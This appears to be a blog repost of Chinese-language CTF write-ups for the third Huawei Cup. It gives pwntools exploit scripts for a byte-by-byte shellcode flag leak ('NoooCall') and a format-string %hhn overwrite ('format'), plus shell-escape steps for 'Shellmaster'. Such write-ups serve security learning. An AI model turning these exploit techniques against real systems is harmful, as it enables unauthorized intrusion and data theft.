首页 > 技术文章 > 第三届华为杯

liyuechan 2019-12-31 16:10 原文

NoooCall

这个要用 shellcode 逐字节对比。

#!/usr/bin/env python

# -*- coding: utf-8 -*-

from pwn import *

import sys

from string import printable

# Assembler/target settings used by asm() below: 64-bit Linux, little-endian.
context(arch='amd64', os='linux', endian='little')
#context.log_level = 'debug'

# Challenge endpoint as given in the write-up; the commented pair is an
# alternate address kept from the original post.
host, port = "192.168.244.161", 8888
#host = '121.36.64.245'
#port = 10003

 

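def expolit(c, i):
    """Probe one byte of the remote buffer: report whether byte `i` equals `c`.

    A fresh connection is opened per call. The shellcode sent loads a pointer
    from [rbp-32], adds `i` to its low byte, and compares the byte found there
    with `c`: on a match it spins forever (`jmp $`), otherwise it executes
    `ret`. The outcome is inferred from the connection afterwards -- the exact
    exception/timeout behaviour of `recv` depends on the pwntools version in use.

    Args:
        c: byte value to test (the caller passes ord() of a printable char).
        i: offset added to the low byte of the pointer loaded from [rbp-32].
           Only `al` is adjusted, so the offset must not carry out of that byte.

    Returns:
        `c` when the read after sending did not raise, otherwise the sentinel
        555555, which the caller interprets as "no match at this offset".
    """
    payload ='''mov bl,%d

    mov rax,[rbp-32]

    add al,%d

    cmp byte ptr [rax],bl

    jz crash

    ret

    crash:

    jmp $

            '''%(c,i)
    r = remote(host, port)
    try:
        r.recvuntil("Your Shellcode >>")
        r.send(asm(payload))
        try:
            r.recv(timeout=1)
        # `except Exception` rather than a bare `except:` so Ctrl-C
        # (KeyboardInterrupt) and SystemExit still stop the probing loop.
        except Exception:
            return 555555
        return c
    finally:
        # Close the socket explicitly; the caller opens many probes in a loop.
        r.close()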

# Recover the buffer one byte at a time: for each offset try every printable
# character (note string.printable also contains whitespace) and keep the first
# one the probe does not reject; stop at the closing '}' or after 32 offsets.
flag = ''
for nn in range(32):
    for ch in printable:
        if expolit(ord(ch), nn) == 555555:
            continue
        flag += ch
        if ch == '}':
            print(flag)
            sys.exit(0)
        log.info(flag)
        break

 

 

format

就是一个简单的格式化字符串漏洞。

#!/usr/bin/env python

# -*- coding: utf-8 -*-

from pwn import *

# Verbose tube logging for this script.
context.log_level = 'debug'

# Challenge endpoint from the write-up; the commented line is the local-process variant.
host, port = "192.168.244.161", 8888
#r = process("")
r = remote(host, port)

def rsl(c1, c2):
    """Wait for `c1` on the module-level connection `r`, then send `c2` plus a newline."""
    conn = r
    conn.recvuntil(c1)
    conn.sendline(c2)

 

def rs(c1, c2):
    """Wait for `c1` on the module-level connection `r`, then send `c2` as-is (no newline)."""
    conn = r
    conn.recvuntil(c1)
    conn.send(c2)

 

# Consume the two banner lines that end in "...\n" before sending input.
for _ in range(2):
    r.recvuntil("...\n")

# Four `%<width>c%<pos>$hhn` pairs: each writes the low byte of the running
# output count through the pointer at positional argument 10 or 18.
payload = '%188c%10$hhn|%171c%18$hhn|%189c%10$hhn|%133c%18$hhn'
# Pad with NUL bytes to exactly 0x37 bytes before sending.
r.send(payload.ljust(0x37, '\x00'))
r.interactive()

 

 

 

 

Shellmaster

用nc连上

然后 $0 进入当前的shell

然后ls

然后 ./flag >&1
